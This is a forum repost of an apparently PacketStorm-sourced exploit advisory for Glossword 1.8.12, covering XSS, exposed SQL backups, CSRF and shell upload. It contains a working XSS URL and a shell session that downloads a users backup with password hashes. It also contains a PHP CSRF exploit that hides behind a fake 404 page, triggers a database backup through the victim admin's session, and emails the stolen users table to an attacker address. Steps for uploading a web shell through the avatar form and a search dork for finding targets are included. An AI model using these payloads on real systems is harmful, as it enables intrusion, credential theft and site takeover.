Praetorian503 Posted February 5, 2013 Report Share Posted February 5, 2013 Glossword version 1.8.12 suffers from database backup disclosure, cross site request forgery, cross site scripting, and remote shell upload vulnerabilities.===================================================Vulnerable Software: Glossword 1.8.12Tested version: Glossword 1.8.12 Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.Dork: Powered by Glossword 1.8.12 ===================================================Tested On: Debian squeeze 6.0.6Server version: Apache/2.2.16 (Debian)Apache traffic server 3.2.0MYSQL: 5.1.66-0+squeeze1PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)Copyright (c) 1997-2009 The PHP GroupZend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologieswith Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH===================================================About vulns:XSShttp://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings===================================================Database Backup disclosure:root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-sessionsession optional pam_umask.so umask=0067root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -Su=rwx,g=x,o=# NOTE 1: Notice database backups chmod'ed to 777 by script## NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS #root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liashtotal 1.1M65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 .60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 ..65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sqlroot@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmproot@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql--2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sqlResolving hacker1.own... 127.0.0.1Connecting to hacker1.own|127.0.0.1|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3184 (3.1K) [text/plain]Saving to: “backup_gwnew_users.sql”100%[======================================================================================>] 3,184 --.-K/s in 0s2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]SET NAMES 'utf8';DROP TABLE IF EXISTS `gwnew_users`;CREATE TABLE `gwnew_users` ( `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT, `login` varbinary(128) NOT NULL, `password` char(32) NOT NULL, `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1', `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0', `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1', `date_reg` int(10) unsigned NOT NULL DEFAULT '0', `date_login` int(10) unsigned NOT NULL DEFAULT '0', `int_items` int(10) unsigned NOT NULL DEFAULT '0', `user_fname` varbinary(64) NOT NULL, `user_sname` varbinary(64) NOT NULL, `user_email` varchar(255) NOT NULL, `user_perm` blob NOT NULL, `user_settings` blob NOT NULL, PRIMARY KEY (`id_user`)) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',0x613a31393a7b733a31303a226176617461725f696d67223b733a31373a22313335393839373436315f73312e706870223b733a31323a226176617461725f696d675f79223b4e3b733a31323a226176617461725f696d675f78223b4e3b733a31303a22676d745f6f6666736574223b733a313a2233223b733a393a2269735f68746d6c6564223b733a313a2231223b733a31333a2269735f7573655f617661746172223b693a303b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a383a226c6f636174696f6e223b733a303a22223b733a31313a2276697375616c7468656d65223b733a393a2267775f73696c766572223b733a31323a2264696374696f6e6172696573223b613a303a7b7d733a363a2269735f647374223b693a303b733a31313a22646174655f666f726d6174223b733a31333a2246206a2c20592c20673a692061223b733a31333a22696d706f72745f666f726d6174223b733a333a22637376223b733a32313a22696d706f72745f69735f636865636b5f6578697374223b693a303b733a31393a22696d706f72745f69735f6f7665727772697465223b693a303b733a32323a22696d706f72745f69735f7370656369616c6368617273223b693a303b733a32303a22696d706f72745f69735f77686974657370616365223b693a303b733a32313a22696d706f72745f69735f636f6e766572745f657363223b693a303b733a32303a22696d706f72745f69735f726561645f6669727374223b693a303b7d);INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);root@debian:/tmp#In this example: backup_gwnew_users.sql gwnew_ is my custom table prefix.In fact while installing script it is = gw_Feel free to create your own bruteforcer:Format is:sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sqlAlso table prefix is not panacea ANYMORE.If Directory index is not forbidden on remote site/server you can see whole : site.tld/gw_export/sql_backup_2013-02Feb-03/directory structure and you can download it in that way.Ok this is not end.Theris another vector of exploitation using CSRF vulnerability.Here we go (CSRF+database dump stealer)Simply trick the logged in admin to visit malicious page.If the attack successfull it will silenty @mail to you victim's database.==============EXPLOIT BEGINS=====================<?phperror_reporting(0);//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');/*http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/*///exit;define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');define("HACKERMAIL",'hacker@g00glemail.tld');define("STANDARDTABLEPREFIX",'gw_');header('Status: 404 Not found!');echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);for($i=1;$i<8;$i++){echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL;}$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . $s=file_get_contents($data);/*uncomment if you want to save on your server # file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);exit;?>================EXPLOIT ENDS HERE======================Ok now about shell upload vulnerability (requires administrative access to site)After gain access to admin panel (in eg via XSS or using backup disclosure)Go to:http://site.tld/gw_admin.php?a=edit-own&t=usersUpload your shell using: Avatar settings tab.Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information.Trace it like this,access it and travel xDhttp://s006.radikal.ru/i215/1302/27/d4b52ad33b39.pngBackup image: http://oi47.tinypic.com/crsde.jpg================================================ KUDOSSSSSSS================================================packetstormsecurity.orgpacketstormsecurity.compacketstormsecurity.netsecurityfocus.comcxsecurity.comsecurity.nnov.rusecurtiyvulns.comsecuritylab.rusecunia.comsecurityhome.euexploitsdownload.comosvdb.comwebsecurity.com.ua1337day.comitsecuritysolutions.orgto all Aa Team + to all Azerbaijan Black HatZ+ *Especially to my bro CAMOUFL4G3 *To All Turkish HackersAlso special thanks to: ottoman38 & HERO_AZE================================================/AkaStepSource: PacketStorm Quote Link to comment Share on other sites More sharing options...